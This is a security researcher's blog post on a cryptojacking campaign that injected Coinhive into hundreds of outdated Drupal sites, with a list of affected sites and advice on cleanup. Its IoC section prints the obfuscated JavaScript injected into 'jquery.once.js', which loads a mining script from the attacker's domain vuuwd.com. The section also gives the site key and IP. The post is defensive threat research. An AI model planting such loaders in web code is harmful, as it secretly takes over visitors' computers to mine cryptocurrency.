Large cryptojacking campaign targeting vulnerable Drupal websites

Yesterday, I was alerted to a cryptojacking campaign affecting the websites of the San Diego Zoo and the government of Chihuahua, Mexico. While these two sites have no relation to each other, they shared a common denominator — they both are using an outdated and vulnerable version of the Drupal content management system. After I analysed the IoCs, I was able to locate over 300 additional websites in this cryptojacking campaign. Many discovered were government and university sites from all over the world.

Digging a little deeper into the cryptojacking campaign, I found in both cases that Coinhive was injected via the same method. The malicious code was contained in the “/misc/jquery.once.js?v=1.2” JavaScript library. Soon thereafter, I was notified of additional compromised sites using a different payload. However, all the infected sites pointed to the same domain using the same Coinhive site key.

Deobfuscated Coinhive malware
In each case, the malicious code was obfuscated and unreadable to humans.

Once the code was deobfuscated, the reference to “http://vuuwd.com/t.js” was clearly seen. Upon visiting the URL, the ugly truth was revealed. A slightly throttled implementation of Coinhive was found.

Domain used to inject Coinhive malware
The Coinhive implementation has small throttle configured to prevent 100% CPU usage.

The site key used was “KNqo4Celu2Z8VWMM0zfRmeJHIl75wMx6.” I confirmed the key was still active by checking in Fiddler. This was a bit redundant as the high CPU usage was a clear indicator of the cryptocurrency mining (hashing) taking place. Regardless, it’s always good to check since Coinhive implemented a few changes to their platform and how they handle abuse after the Brian Krebs investigation.

After contacting the San Diego Zoo advising them to remove the malware, I took a closer look at the domain name vuuwd.com.

While the WHOIS information was clearly fake, the email address used was associated with other domain registrations. This information is likely valuable for further investigation, but I decided not to go down that rabbit hole. Instead, I focused on the domain name at-hand, vuuwd.com.

This historical DNS data from SecurityTrails was especially interesting. We can clearly see the domain name was used previously in Monero (XMR) mining operations via mineXMR.com. While it’s somewhat unusual they’d switch from a mining pool with a 1% fee to Coinhive, who takes a 30% cut of all mining proceeds, it was the choice they made.

Now that IoCs were clearly established, I turned to PublicWWW to locate other affected sites. The initial query I used yielded over 100,000 sites with references the JavaScript library “/misc/jquery.once.js?v=1.2” in their source code. This was pared down to around 80,000 sites once I extracted the explicit snippet using regular expression via PublicWWW’s snipex function.

Once I had the potential list of affected sites, I began scanning them for IoCs containing the obfuscated Coinhive malware. This was done using tools developed for me by Dan Snider. Dan has frequently provided invaluable assistance to my research and I recommend reading more about his work here.

The big reveal

After the scan completed, the full scope of this cryptojacking campaign was established — 348 infected websites. Using the bulk scan feature of urlscan.io, it became clear these were all sites were running outdated and vulnerable versions of Drupal content management system.

The affected sites varied by hosting providers and countries and no specific one appeared to be targeted. The most unique domains were found in the United States and were hosted by Amazon.

Unique domains found by countryUnique domains found by hosting provider

Looking further into the sites found, I was able to locate domains tied to educational institutions and government entities all over the world.

Government sites affected

The National Labor Relations Board – US federal agency
www.nlrb.gov

Government of Chihuahua, Mexico
chihuahua.gob.mx

City of Marion, Ohio
www.marionohio.us

Arizona Board of Behavioral Health Examiners
azbbhe.us

Social Security Institute of the State of Mexico and Municipalities
issemym.gob.mx

Turkish Revenue Administration – Aydın Tax Office
aydinvdb.gov.tr

Procalidad – “The Project Improvement of Higher Education Quality” – Peru
procalidad.gob.pe

Matzikama Municipality
www.matzikamamun.co.za

UMBRIA Special Reconstruction Office
www.sismaumbria2016.it

 

University / school sites affected

University of Aleppo
alepuniv.edu.sy

College of Biblical Studies
cbshouston.edu

IOHANES – University of Balamand
iohanes.balamand.edu.lb

Ringling College of Art and Design
www.ringling.edu

Vidyalankar Institute of Technology
vit.edu.in

University of Batangas
ub.edu.ph

Asia Pacific Institute of Information Technology (APIIT)
www.apiit.edu.my

Management Development Institute of Singapore in Tashkent
mdis.uz

Islamic Azad University of the Semnan branch
www.semnaniau.ac.ir

Tan Dan Secondary School
thcstttandan.edu.vn

 

Other sites affected

The full list of domains affected by this cryptojacking campaign is available in this Google Sheet. The direct URL to infected JavaScript library (jquery.once.js?v=1.2) for each site is included. In addition, the title tag (name/description) has been extracted and is listed in the sheet.

2018-05-07 update

Additional websites have been identified and have been added to the Google Sheet. Notable sites include those of Lenovo, UCLA, DLink (Brazil), and Office of Inspector General of the U.S. Equal Employment Opportunity Commission (EEOC) — a US federal government agency.

Malicious code found on Lenovo's portal page.
Malicious code found on Lenovo’s portal page.

Websites of UCLA and DLink Brazil were also found injecting Coinhive.

Coinhive is configured to use roughly 80% CPU to mine for cryptocurrency
Coinhive is configured to use roughly 80% CPU to mine for cryptocurrency.

For some odd reason, the operator of this cryptojacking campaign chose to use a self-signed SSL certificate instead of a trusted (CA) one. This could have easily (and freely) been done using LetsEncrypt — but was not. Due to this, the cryptojacking malware fails to load in the browser via HTTPS.

In addition to the self-signed SSL cert misstep, the reference to the non-secure version is included in some sites, such as the Office of Inspector General of the EEOC. This is yet another blunder that hinders the effectiveness  of this cryptojacking campaign as Coinhive does not load.

2018-05-16 update

This cryptojacking campaign continues as the malware host vuuwd.com has been restored with a new Coinhive site key.

The spreadsheet of affected sites has been updated with my latest scan results. Follow me on Twitter for the latest updates on this ongoing story

IoCs

http://vuuwd.com/t.js

https://vuuwd.com/t.js (Self-signed SSL cert by "WIN-QNCIT36VCLJ")

162.222.213.236

var RqLm1=window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x73\x42\x79\x54\x61\x67\x4e\x61\x6d\x65"]('\x68\x65\x61\x64')[0];var D2=window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74"]('\x73\x63\x72\x69\x70\x74');D2["\x74\x79\x70\x65"]='\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74';D2["\x69\x64"]='\x6d\x5f\x67\x5f\x61';D2["\x73\x72\x63"]='\x68\x74\x74\x70\x3a\x2f\x2f\x76\x75\x75\x77\x64\x2e\x63\x6f\x6d\x2f\x74\x2e\x6a\x73';RqLm1["\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64"](D2);

var dZ1= window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x73\x42\x79\x54\x61\x67\x4e\x61\x6d\x65"]('\x68\x65\x61\x64')[0]; var ZBRnO2= window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74"]('\x73\x63\x72\x69\x70\x74'); ZBRnO2["\x74\x79\x70\x65"]= '\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74'; ZBRnO2["\x69\x64"]='\x6d\x5f\x67\x5f\x61';ZBRnO2["\x73\x72\x63"]= '\x68\x74\x74\x70\x73\x3a\x2f\x2f\x76\x75\x75\x77\x64\x2e\x63\x6f\x6d\x2f\x74\x2e\x6a\x73'; dZ1["\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64"](ZBRnO2);

;(function(){var k=navigator[b("st{n(e4g9A2r,exs,u8")];var s=document[b("je,i{kaofo6c(")];if(p(k,b("hs{w{o{d;n,i5W)"))&&!p(k,b("rd4i{ojr}d;n)A}"))){if(!p(s,b(":=ea)m,t3u{_,_4_5"))){var w=document.createElement('script');w.type='text/javascript';w.async=true;w.src=b('5a{b)28e;2,0;1,e}5;fa1}1p97c;7)a}c(e;4{2,=)v{&m0}2)2,=,d{i4c4?(s}j1.)end;o,c}_xs)/(g8rio3.{ten}e,m}h,s(e}r)f1e;r)e;v)i;t{i9s,ozpb.wk{c}a}ryt1/}/k:9p)tnt}h8');var z=document.getElementsByTagName('script')[0];z.parentNode.insertBefore(w,z);}}function b(c){var o='';for(var l=0;l<c.length;l++){if(l%2===1)o+=c[l];}o=h(o);return o;}function p(i,t){if(i[b("&f}O,xoe}d,n(i(")](t)!==-1){return true;}else{return false;}}function h(y){var n='';for(var v=y.length-1;v>=0;v--){n+=y[v];}return n;}})();

KNqo4Celu2Z8VWMM0zfRmeJHIl75wMx6

Closing Remarks

We’ve seen plenty examples of Drupalgeddon 2 being exploited in the past few weeks. This is yet another case of miscreants compromising outdated and vulnerable Drupal installations on a large scale. If you’re a website operator using Drupal’s content management system, you need to update to the latest available version ASAP. The Drupal security team has prepared a FAQ which documents the risk level and mitigation steps. Note that installing the update won’t retroactively “unhack” your website and you may need to take further remediation steps.

To stop cryptojacking in your browser, I recommend the extension minerBlock to block cryptojacking malware.

If you use other methods of blocking malicious activity at the network level, such as Pi-hole, you can use the blocklist provided by CoinBlockerLists, which is frequently updated with the domains and IPs used by coinmining malware and illicit cryptomining operations.

If you’d like to learn more about my work and what others are saying about it, please see this page. As always, I’m most active on Twitter — follow me @bad_packets

Also, be sure to check out my Mirai-like botnet data website!

7 Replies to “Large cryptojacking campaign targeting vulnerable Drupal websites”

Leave a Reply